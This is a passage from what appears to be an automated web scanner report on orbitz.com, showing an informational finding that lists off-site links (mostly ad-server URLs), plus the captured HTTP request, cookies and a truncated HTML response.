<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=middle&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=middle&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=middle&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="adfeaturedest">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=script&pos=middle&"></script>
...[SNIP]...
<div class="ad" id="ad250x250_left">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=left&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=left&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=left&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad250x250_right">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=right&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=right&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=right&" height="null" width="null" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1x1">
<iframe allowtransparency="true" height="1" width="1channel=deals" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&height=1&width=1channel=deals&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&height=1&width=1channel=deals&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&height=1&width=1channel=deals&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&height=1&width=1channel=deals&" height="1" width="1channel=deals" border="0"></a>
...[SNIP]...

17.344. http://www.orbitz.com/App/PerformMDLPDealsContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=orbitz-visa-m

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://twitter.com/orbitz
http://www.capitalone.com/creditcards/orbitz/index.php?external_id=WWW_Z0000_USC_ORBITZ_ZZZZZ_ZZZ_PARTNER
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&Section=main&adsize=1x1&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_bottom&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_top&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=336x280&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=sponsorlogo&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&
http://www.revresda.com/html.ng/Section=main&adsize=1x1&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=featuredest&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=script&pos=middle&
http://www.revresda.com/image.ng/Params.richmedia=yes&Section=main&adsize=1x1&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_bottom&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_top&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=336x280&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=sponsorlogo&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&
http://www.revresda.com/js.ng/Params.richmedia=yes&Section=main&adsize=1x1&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_bottom&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_top&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=336x280&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=sponsorlogo&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&

Request

GET /App/PerformMDLPDealsContent?deal_id=orbitz-visa-m HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=04A4B4FA158B61349FE7ED081F37C459; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Thu, 03 Feb 2011 06:45:37 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660;path=/
Content-Length: 179835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="adsponsorlogo">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=sponsorlogo&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=sponsorlogo&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=sponsorlogo&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad hotelTelesalesAd">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x600_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_top&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=top&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_top&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=top&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_top&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=top&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x600_bottom">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_bottom&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=bottom&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_bottom&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=bottom&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_bottom&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=bottom&" height="null" width="null" border="0"></a>
...[SNIP]...
<br />
        <a href="http://www.capitalone.com/creditcards/orbitz/index.php?external_id=WWW_Z0000_USC_ORBITZ_ZZZZZ_ZZZ_PARTNER" target="_blank"><img src="/public/ANS/Images/CapitalOne_but_Applynow.jpg" alt="Apply Now" border="0" title="Apply Now" />
...[SNIP]...
<img src="/public/ANS/Images/Capital1_ponitscalci_header.jpg" alt="Points Calculator" title="Points Calculator" style="margin-top:20px;" />
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="580" height="425" title="Points Calculator">
<param name="movie" value="/public/ANS/Orbitz/html/theme/point-calculator.swf" />
...[SNIP]...
<img src="/public/ANS/Images/CapitalOne-applynow1.jpg" border="0" style="margin:10px 0 10px 0; padding-left:35px;float:left" /> <a href="http://www.capitalone.com/creditcards/orbitz/index.php?external_id=WWW_Z0000_USC_ORBITZ_ZZZZZ_ZZZ_PARTNER" target="_blank"><img src="/public/ANS/Images/CapitalOne_but_Applynow.jpg" alt="Apply Now" border="0" title="Apply Now" style="float:left; padding-top:15px" />
...[SNIP]...
<img src="/public/ANS/Images/CapitalOne-applynow1.jpg" border="0" style="margin:10px 0 10px 0; padding-left:35px;float:left" /> <a href="http://www.capitalone.com/creditcards/orbitz/index.php?external_id=WWW_Z0000_USC_ORBITZ_ZZZZZ_ZZZ_PARTNER" target="_blank"><img src="/public/ANS/Images/CapitalOne_but_Applynow.jpg" alt="Apply Now" border="0" title="Apply Now" style="float:left; padding-top:15px" />
...[SNIP]...
<div class="ad" id="ad336x280">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=336x280&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=middle&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=336x280&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=middle&"><img 